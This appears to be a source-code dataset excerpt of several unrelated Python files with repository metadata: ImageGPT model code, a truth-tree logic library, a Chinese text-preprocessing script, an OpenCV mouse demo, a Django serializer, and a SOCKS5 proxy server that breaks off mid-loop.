outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask[i],
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
# Model Parallel: If it's the last layer for that device, put things on the next device
if self.model_parallel:
for k, v in self.device_map.items():
if i == v[-1] and "cuda:" + str(k) != self.last_device:
hidden_states = hidden_states.to("cuda:" + str(k + 1))
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"""
The ImageGPT Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTForCausalImageModeling(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"attn.masked_bias", r"attn.bias", r"lm_head.weight"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.transformer = ImageGPTModel(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size - 1, bias=False)
# Model parallel
self.model_parallel = False
self.device_map = None
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
    def prepare_inputs_for_generation(self, input_ids: torch.Tensor, past: Optional[Tuple[Tuple[torch.Tensor]]] = None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
            `labels = input_ids`. Indices are selected in `[-100, 0, ..., config.vocab_size]`. All labels set to `-100`
            are ignored (masked); the loss is only computed for labels in `[0, ..., config.vocab_size]`.
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTForCausalImageModeling
>>> import torch
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTForCausalImageModeling.from_pretrained("openai/imagegpt-small")
>>> device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
>>> model.to(device)
>>> # unconditional generation of 8 images
>>> batch_size = 8
>>> context = torch.full((batch_size, 1), model.config.vocab_size - 1) # initialize with SOS token
        >>> context = context.to(device)
>>> output = model.generate(
... input_ids=context, max_length=model.config.n_positions + 1, temperature=1.0, do_sample=True, top_k=40
... )
>>> clusters = feature_extractor.clusters
>>> n_px = feature_extractor.size
>>> samples = output[:, 1:].cpu().detach().numpy()
>>> samples_img = [
... np.reshape(np.rint(127.5 * (clusters[s] + 1.0)), [n_px, n_px, 3]).astype(np.uint8) for s in samples
... ] # convert color cluster tokens back to pixels
>>> f, axes = plt.subplots(1, batch_size, dpi=300)
>>> for img, ax in zip(samples_img, axes):
... ax.axis("off")
... ax.imshow(img)
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states)
loss = None
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
cross_attentions=transformer_outputs.cross_attentions,
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the `past_key_values` cache if [`~PreTrainedModel.beam_search`] or
[`~PreTrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct
beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
@add_start_docstrings(
"""
The ImageGPT Model transformer with an image classification head on top (linear layer).
[`ImageGPTForImageClassification`] average-pools the hidden states in order to do the classification.
""",
IMAGEGPT_START_DOCSTRING,
)
class ImageGPTForImageClassification(ImageGPTPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head.weight"]
def __init__(self, config: ImageGPTConfig):
super().__init__(config)
self.num_labels = config.num_labels
self.transformer = ImageGPTModel(config)
self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(IMAGEGPT_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=SequenceClassifierOutputWithPast, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
inputs_embeds: Optional[torch.Tensor] = None,
labels: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs: Any,
) -> Union[Tuple, SequenceClassifierOutputWithPast]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
Returns:
Examples:
```python
>>> from transformers import ImageGPTFeatureExtractor, ImageGPTForImageClassification
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = ImageGPTFeatureExtractor.from_pretrained("openai/imagegpt-small")
>>> model = ImageGPTForImageClassification.from_pretrained("openai/imagegpt-small")
>>> inputs = feature_extractor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> logits = outputs.logits
```"""
if "pixel_values" in kwargs:
warnings.warn(
"The `pixel_values` argument is deprecated and will be removed in a future version, use `input_ids`"
" instead.",
FutureWarning,
)
if input_ids is not None:
raise ValueError(
"You cannot pass both `pixel_values` and `input_ids`. Please make sure to only pass `input_ids`."
)
input_ids = kwargs.pop("pixel_values")
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
# average-pool the hidden states along the sequence dimension
pooled_hidden_states = hidden_states.mean(dim=1)
# project from (batch_size, hidden_size) to (batch_size, num_labels)
logits = self.score(pooled_hidden_states)
loss = None
if labels is not None:
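            # If the config does not pin a problem type, infer it from
            # num_labels and the label dtype (regression vs. single- vs.
            # multi-label classification), as other classification heads do.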
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutputWithPast(
loss=loss,
logits=logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
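

# --- Editorial sketch (not part of the original file): a minimal check of the
# `_reorder_cache` semantics above, assuming key/value caches shaped
# (batch, num_heads, seq_len, head_dim); index_select(0, beam_idx) implies
# reordered[i] == original[beam_idx[i]] for each layer's key and value.
if __name__ == "__main__":
    _past = tuple(
        (torch.randn(4, 2, 3, 8), torch.randn(4, 2, 3, 8)) for _ in range(2)
    )
    _beam_idx = torch.tensor([2, 0, 1, 3])
    _reordered = ImageGPTForCausalImageModeling._reorder_cache(_past, _beam_idx)
    assert torch.equal(_reordered[0][0][0], _past[0][0][2])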
| 44.228359
| 120
| 0.640124
|
4a18c6868ffbc547ca2cf71063f787dff5a9aaaf
| 4,572
|
py
|
Python
|
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
logical_statement.py
|
BenKelly99/TruthTreeGenerator
|
d4f5613ddc1586b1a42b049c96f12410dbfc31b1
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class LogicalStatement(ABC):
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
@abstractmethod
def getString(self):
pass
class BinaryStatement(LogicalStatement):
def __init__(self, leftOperand, rightOperand, operator):
self.leftOperand = leftOperand
self.rightOperand = rightOperand
self.operator = operator
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
def getString(self):
return "(" + self.leftOperand.getString() + " " + self.operator + " " + self.rightOperand.getString() + ")"
class UnaryStatement(LogicalStatement):
def __init__(self, operand, operator):
self.operand = operand
self.operator = operator
@abstractmethod
def evaluate(self, truth_assignment):
pass
@abstractmethod
def getDecomposition(self):
pass
def getString(self):
return self.operator + self.operand.getString()
class Literal(LogicalStatement):
def __init__(self, literal):
self.literal = literal
def evaluate(self, truth_assignment):
return truth_assignment[self.literal]
def getDecomposition(self):
return None
def getString(self):
return self.literal
class Negation(UnaryStatement):
def __init__(self, operand):
UnaryStatement.__init__(self, operand, "¬")
def evaluate(self, truth_assignment):
return not self.operand.evaluate(truth_assignment)
def getDecomposition(self):
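        # Truth-tree convention used throughout: a decomposition is a list of
        # branches, and each branch is a list of statements that must all hold
        # on that branch.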
if isinstance(self.operand, Literal):
return None
elif isinstance(self.operand, Negation):
return [[self.operand.operand]]
elif isinstance(self.operand, And):
            return [[Negation(self.operand.leftOperand)], [Negation(self.operand.rightOperand)]]
elif isinstance(self.operand, Or):
            return [[Negation(self.operand.leftOperand), Negation(self.operand.rightOperand)]]
elif isinstance(self.operand, Conditional):
            return [[self.operand.leftOperand, Negation(self.operand.rightOperand)]]
elif isinstance(self.operand, Biconditional):
return [[self.operand.leftOperand, Negation(self.operand.rightOperand)], [Negation(self.operand.leftOperand), self.operand.rightOperand]]
class And(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "∧")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) and self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand, self.rightOperand]]
class Or(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "∨")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) or self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand], [self.rightOperand]]
class Conditional(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "→")
def evaluate(self, truth_assignment):
return (not self.leftOperand.evaluate(truth_assignment)) or self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[Negation(self.leftOperand)], [self.rightOperand]]
class Biconditional(BinaryStatement):
def __init__(self, leftOperand, rightOperand):
BinaryStatement.__init__(self, leftOperand, rightOperand, "↔")
def evaluate(self, truth_assignment):
return self.leftOperand.evaluate(truth_assignment) == self.rightOperand.evaluate(truth_assignment)
def getDecomposition(self):
return [[self.leftOperand, self.rightOperand], [Negation(self.leftOperand), Negation(self.rightOperand)]]
if __name__ == "__main__":
A = Literal("A")
B = Literal("B")
C = Literal("C")
l1 = And(A, B)
l2 = Or(B, C)
l3 = Conditional(l1, l2)
l4 = Conditional(Negation(A), Negation(l2))
lFinal = And(l3, l4)
print(lFinal.getString())
truth_assignment = {}
truth_assignment["A"] = False
truth_assignment["B"] = True
truth_assignment["C"] = False
#print(lFinal.evaluate(truth_assignment))
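
    # --- Editorial sketch (not in the original file): a negated conjunction
    # decomposes into two branches, one per negated conjunct.
    neg_and = Negation(l1)  # ¬(A ∧ B)
    print([[s.getString() for s in branch] for branch in neg_and.getDecomposition()])
    # expected output: [['¬A'], ['¬B']]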
| 32.892086
| 149
| 0.688101
|
4a18c687d677d636843fe67e7e4567d285f6b89f
| 2,737
|
py
|
Python
|
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | 2
|
2020-05-14T16:25:19.000Z
|
2020-06-28T13:53:50.000Z
|
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | null | null | null |
preprocess.py
|
jackyin68/chinese-relationship-nre
|
92df0bf3737bbddd4f5a4e816da216536a60b0ff
|
[
"MIT"
] | null | null | null |
import logging
import multiprocessing
import re
import string
import jieba
from tqdm import tqdm
from zhon.hanzi import punctuation
raw_file = 'data/raw/text.txt'
clean_file = 'data/processed/clean_text.txt'
seg_file = 'data/processed/seg_text.txt'
logger = logging.getLogger('Preprocess')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
def clean_func(line):
line_punct_replaced = re.sub(r"[%s]+" % punctuation, " ", line)
line_string_punct_replaced = re.sub(r"[%s]+" % string.punctuation, " ", line_punct_replaced)
line_removed_character = re.sub(r"[a-zA-Z]+", " ", line_string_punct_replaced)
return line_removed_character
def data_clean():
multiprocessing.set_start_method('spawn')
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
logger.info('Loading raw text')
with open(raw_file, 'r', encoding='utf8') as fin:
raw_lines = fin.readlines()
fin.close()
logger.info('Cleaning raw text')
results = []
    lines = tqdm(raw_lines, desc=u'Cleaned 0 lines of text')
for i, line in enumerate(lines):
results.append(pool.apply(clean_func, (line,)))
if i % 10000 == 0:
            lines.set_description(u'Cleaned %s lines of text' % i)
pool.close()
pool.join()
logger.info('Writing clean text')
with open(clean_file, 'w', encoding='utf8') as fout:
line_min_len = 5
for line in results:
if len(line.strip()) < line_min_len:
continue
fout.writelines(line)
fout.close()
    logger.info('Text cleaning finished')
def seq_func(line):
# print("seq:", line)
return " ".join(jieba.cut(line, cut_all=False))
def data_seg():
logger.info('Segmenting cleaned text')
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
logger.info('Loading clean text')
with open(clean_file, 'r', encoding='utf8') as fin:
clean_lines = fin.readlines()
fin.close()
logger.info('Segmenting clean text')
results = []
    lines = tqdm(clean_lines, desc=u'Segmented 0 lines of text')
for i, line in enumerate(lines):
results.append(pool.apply(seq_func, (line,)))
if i % 10000 == 0:
            lines.set_description(u'Segmented %s lines of text' % i)
pool.close()
pool.join()
logger.info('Writing segment text')
with open(seg_file, 'w', encoding='utf8') as fout:
for line in results:
fout.writelines(line)
fout.close()
    logger.info('Text segmentation finished')
if __name__ == "__main__":
data_clean()
data_seg()
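
    # --- Editorial sanity check (commented out; not in the original script):
    # clean_func replaces CJK/ASCII punctuation and Latin letters with spaces,
    # keeping CJK characters and digits:
    # print(clean_func("自然语言处理, NLP, 2020!"))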
| 28.216495
| 96
| 0.663866
|
4a18c96bd17726ce97a25359e6008553082163ac
| 760
|
py
|
Python
|
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
Day07/mouse.py
|
dksmuz7/open-cv
|
eff81e97aa9830ae0342a98f942b0b082e4d7f2a
|
[
"MIT"
] | null | null | null |
# Mouse event bindings
# importing library
import cv2 as cv
import numpy as np
def draw(event,x,y,flags,param):
print("Flags =",flags) # unique for button clicked
print("Param =",param) # process is going on
# binding double left click to draw circle
if event == cv.EVENT_LBUTTONDBLCLK:
cv.circle(img,(x,y),75,(0,255,255),5)
# binding middle button down to draw rectangle
if event == cv.EVENT_MBUTTONDOWN:
cv.rectangle(img,(x,y),(x+100,y+50),(0,255,255),5)
cv.namedWindow(winname = "Result")
# creating black image
img = np.zeros((600,800,3),np.uint8)
cv.setMouseCallback("Result",draw)
while True:
cv.imshow("Result",img)
if cv.waitKey(1) & 0xFF == 27: # 27= ESC key
break
cv.destroyAllWindows()
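
# --- Editorial sketch (not part of the original file): further bindings
# follow the same pattern, e.g. a right-button handler inside draw():
#     if event == cv.EVENT_RBUTTONDOWN:
#         cv.line(img, (x, y), (x + 100, y + 100), (255, 0, 0), 3)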
| 25.333333
| 58
| 0.665789
|
4a18ca12cf0ed4f966f593ce63ac50d4b21bd280
| 459
|
py
|
Python
|
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | 1
|
2020-06-26T22:08:42.000Z
|
2020-06-26T22:08:42.000Z
|
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | null | null | null |
backend/medicar/agendamento/serializers/usuario.py
|
devlarysson/medicar
|
da47f03e6718c2053d42360806aae3ebb3b6f727
|
[
"MIT"
] | 1
|
2020-08-04T21:42:45.000Z
|
2020-08-04T21:42:45.000Z
|
from django.contrib.auth.models import User
from rest_framework import serializers
class UsuarioSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'password', 'first_name']
def create(self, validated_data):
password = validated_data.pop('password')
user = User.objects.create(**validated_data)
user.set_password(password)
user.save()
return user
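
# --- Editorial sketch (not in the original file): typical usage with
# hypothetical data; create() hashes the password via set_password instead of
# storing it raw.
# serializer = UsuarioSerializer(data={
#     "username": "alice", "email": "alice@example.com",
#     "password": "s3cret", "first_name": "Alice",
# })
# if serializer.is_valid():
#     user = serializer.save()  # dispatches to create()
#     assert user.check_password("s3cret")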
| 28.6875
| 64
| 0.679739
|
4a18cacffd1dc7f3674441885d1409e734e84911
| 10,169
|
py
|
Python
|
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
socks5_server.py
|
raddup/socks5-server-py
|
44f7d3f491ff33087d2c9ceacd1b3269ad2aad14
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" socks5_server
Supports both python 2 and 3.
"""
__author__ = "Caleb Madrigal"
__date__ = '2016-10-17'
import sys
import argparse
import logging
import socket
import select
import threading
PY3 = sys.version_info[0] == 3
if PY3:
chr_to_int = lambda x: x
encode_str = lambda x: x.encode()
else:
chr_to_int = ord
encode_str = lambda x: x
SOCK_TIMEOUT = 5 # seconds
RESEND_TIMEOUT = 60 # seconds
MAX_RECEIVE_SIZE = 65536
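
# SOCKS5 wire-format constants (byte values as used by RFC 1928)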
VER = b'\x05'
METHOD = b'\x00'
SUCCESS = b'\x00'
SOCK_FAIL = b'\x01'
NETWORK_FAIL = b'\x02'
HOST_FAIL = b'\x04'
REFUSED = b'\x05'
TTL_EXPIRED = b'\x06'
UNSUPPORTED_CMD = b'\x07'
ADDR_TYPE_UNSUPPORT = b'\x08'
UNASSIGNED = b'\x09'
ADDR_TYPE_IPV4 = b'\x01'
ADDR_TYPE_DOMAIN = b'\x03'
ADDR_TYPE_IPV6 = b'\x04'
CMD_TYPE_CONNECT = b'\x01'
CMD_TYPE_TCP_BIND = b'\x02'
CMD_TYPE_UDP = b'\x03'
def make_logger(log_path=None, log_level_str='INFO'):
formatter = logging.Formatter('%(asctime)s: %(name)s (%(levelname)s): %(message)s')
if log_path:
log_handler = logging.FileHandler(log_path)
else:
log_handler = logging.StreamHandler(sys.stdout)
log_handler.setFormatter(formatter)
logger = logging.getLogger('socks5_server')
logger.addHandler(log_handler)
log_level = logging.getLevelName(log_level_str.upper())
logger.setLevel(log_level)
return logger
class Socks5Server:
def __init__(self, host, port, logger, backlog=128):
self.host = host
self.port = port
self.logger = logger
self.backlog = backlog
self.client_dest_map_lock = threading.Lock()
# This holds client_sock -> dest_sock and dest_sock -> client_sock mappings
self.client_dest_map = {}
# Maps from sock -> buffer to send to sock
self.sock_send_buffers = {}
def buffer_receive(self, sock):
""" Reads into the buffer for the corresponding relay socket. """
target_sock = self.client_dest_map[sock]
buf = sock.recv(MAX_RECEIVE_SIZE)
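        # recv() returning b'' means the peer closed its end of the connection.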
if len(buf) == 0:
self.flush_and_close_sock_pair(sock)
elif target_sock not in self.sock_send_buffers:
self.sock_send_buffers[target_sock] = buf
else:
self.sock_send_buffers[target_sock] = self.sock_send_buffers[target_sock] + buf
def buffer_send(self, sock):
if sock in self.sock_send_buffers:
bytes_sent = sock.send(self.sock_send_buffers[sock])
self.sock_send_buffers[sock] = self.sock_send_buffers[sock][bytes_sent:]
def flush_and_close_sock_pair(self, sock, error_msg=None):
""" Flush any remaining send buffers to the correct socket, close the sockets, and remove
the pair of sockets from both the client_dest_map and the sock_send_buffers dicts. """
if error_msg:
self.logger.error('flushing and closing pair due to error: %s' % error_msg)
else:
self.logger.info('Flushing and closing finished connection pair')
with self.client_dest_map_lock:
partner_sock = self.client_dest_map.pop(sock)
self.client_dest_map.pop(partner_sock)
try:
partner_sock.send(self.sock_send_buffers.pop(partner_sock, b''))
partner_sock.close()
sock.send(self.sock_send_buffers.pop(sock, b''))
sock.close()
except Exception:
pass
def establish_socks5(self, sock):
""" Speak the SOCKS5 protocol to get and return dest_host, dest_port. """
dest_host, dest_port = None, None
try:
            ver, nmethods = sock.recv(1), sock.recv(1)
            # Read every offered auth method (nmethods of them), not just one byte.
            methods = sock.recv(ord(nmethods))
sock.sendall(VER + METHOD)
ver, cmd, rsv, address_type = sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1)
dst_addr = None
dst_port = None
if address_type == ADDR_TYPE_IPV4:
dst_addr, dst_port = sock.recv(4), sock.recv(2)
dst_addr = '.'.join([str(chr_to_int(i)) for i in dst_addr])
elif address_type == ADDR_TYPE_DOMAIN:
addr_len = ord(sock.recv(1))
dst_addr, dst_port = sock.recv(addr_len), sock.recv(2)
dst_addr = ''.join([chr(chr_to_int(i)) for i in dst_addr])
elif address_type == ADDR_TYPE_IPV6:
dst_addr, dst_port = sock.recv(16), sock.recv(2)
tmp_addr = []
for i in range(len(dst_addr) // 2):
tmp_addr.append(chr(dst_addr[2 * i] * 256 + dst_addr[2 * i + 1]))
dst_addr = ':'.join(tmp_addr)
dst_port = chr_to_int(dst_port[0]) * 256 + chr_to_int(dst_port[1])
server_sock = sock
server_ip = ''.join([chr(int(i)) for i in socket.gethostbyname(self.host).split('.')])
if cmd == CMD_TYPE_TCP_BIND:
self.logger.error('TCP Bind requested, but is not supported by socks5_server')
sock.close()
elif cmd == CMD_TYPE_UDP:
self.logger.error('UDP requested, but is not supported by socks5_server')
sock.close()
elif cmd == CMD_TYPE_CONNECT:
sock.sendall(VER + SUCCESS + b'\x00' + b'\x01' + encode_str(server_ip +
chr(self.port // 256) + chr(self.port % 256)))
dest_host, dest_port = dst_addr, dst_port
else:
                # Unsupported/unknown command
self.logger.error('Unsupported/unknown SOCKS5 command requested')
sock.sendall(VER + UNSUPPORTED_CMD + encode_str(server_ip + chr(self.port // 256) +
chr(self.port % 256)))
sock.close()
        except Exception as e:
self.logger.error('Error in SOCKS5 establishment: %s' % e)
return dest_host, dest_port
def handle_connect_thread(self, client_sock, addr):
""" Handles the establishment of the connection from the client, the socks5 protocol,
and to the destination. Once finished, it puts the client and dest sockets into the
self.client_dest_map, from where they are serviced by the main loop/thread. """
self.logger.info('Connection from: %s:%d' % addr)
client_sock.settimeout(SOCK_TIMEOUT)
dest_host, dest_port = self.establish_socks5(client_sock)
if None in (dest_host, dest_port):
client_sock.close()
return None
self.logger.debug('Trying to connect to destination: %s:%d' % (dest_host, dest_port))
dest_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dest_sock.settimeout(RESEND_TIMEOUT)
try:
dest_sock.connect((dest_host, dest_port))
except Exception as e:
self.logger.error('Failed to connect to requested destination (%s:%d) due to error: %s'
% (dest_host, dest_port, e))
client_sock.close()
return None
self.logger.debug('Connection to %s:%d established' % (dest_host, dest_port))
# From this point on, we'll be doing nonblocking io on the sockets
client_sock.settimeout(RESEND_TIMEOUT)
client_sock.setblocking(0)
dest_sock.setblocking(0)
with self.client_dest_map_lock:
self.client_dest_map[client_sock] = dest_sock
self.client_dest_map[dest_sock] = client_sock
self.logger.info('SOCKS5 proxy from %s:%d to %s:%d established' %
(addr[0], addr[1], dest_host, dest_port))
def accept_connection(self):
(client, addr) = self.server_sock.accept()
t = threading.Thread(target=self.handle_connect_thread, args=(client, addr))
t.daemon = True
t.start()
def serve_forever(self):
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.bind((self.host, self.port))
self.server_sock.listen(self.backlog)
self.logger.info('Serving on %s:%d' % (self.host, self.port))
while True:
connected_sockets = list(self.client_dest_map.keys())
in_socks = [self.server_sock] + connected_sockets
out_socks = connected_sockets
in_ready, out_ready, err_ready = select.select(in_socks, out_socks, [], 0.1)
for sock in in_ready:
if sock == self.server_sock:
self.accept_connection()
else:
try:
self.buffer_receive(sock)
except Exception as e:
self.flush_and_close_sock_pair(sock, str(e))
for sock in out_ready:
try:
self.buffer_send(sock)
except Exception:
pass
for sock in err_ready:
if sock == self.server_sock:
